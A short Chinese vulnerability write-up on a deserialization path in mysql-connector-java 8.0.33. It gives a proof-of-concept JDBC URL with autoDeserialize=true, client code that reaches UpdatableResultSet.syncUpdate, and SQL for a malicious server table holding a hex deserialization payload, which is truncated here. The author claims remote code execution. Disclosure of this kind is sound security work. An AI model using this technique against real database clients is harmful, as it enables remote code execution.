mysql-connector-java 8.0.33 反序列化漏洞

前言

经过与oracle官方沟通，在最新的mysql-connector-j 9.0.0里不存在这个问题，所以他们不认为这是个漏洞
不过确实，mysql-connector-java这个分支已经迁移到mysql-connector-j了，当时没注意，交的时候只注意了mysql-connector-java 8.0.33确实是latest version

描述

在mysql jdbc反序列化漏洞出来之后，patch了ServerStatusDiffInterceptor的逻辑，让他没有调用getObject
但是我发现，在UpdatableResultSet的syncUpdate方法还是会调用到getObject

当时就搜了一下updateResultset的demo，然后跑了一下，发现都能直接调用到syncUpdate,然后就通了

poc

String url="jdbc:mysql://ip:port/test?autoDeserialize=true";
String username="root";
String password="test ";
DriverManager.getConnection(url,username,password); 
Statement stmt =
connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_UPDATABLE);
ResultSet rs = stmt.executeQuery("SELECT id,object FROM objects"); while (rs.next()) {rs.updateInt("object",1);}
rs.close(); stmt.close(); connection.close();

他这里的问题就是 不管你实际调用的updateInt还是updateString，他都会进入syncUpdate 然后getObject这个column，只要这个column我们填写恶意的反序列化数据，就可以反序列化
然后我们需要一个恶意的mysql服务器

CREATE TABLE `objects_table` ( `id` INT AUTO_INCREMENT,
`object` BLOB, PRIMARY KEY (`id`))
INSERT INTO `objects_table`(`object`) VALUES (UNHEX('ace.........16178'));

插入hex编码的反序列化payload，运行就可以rce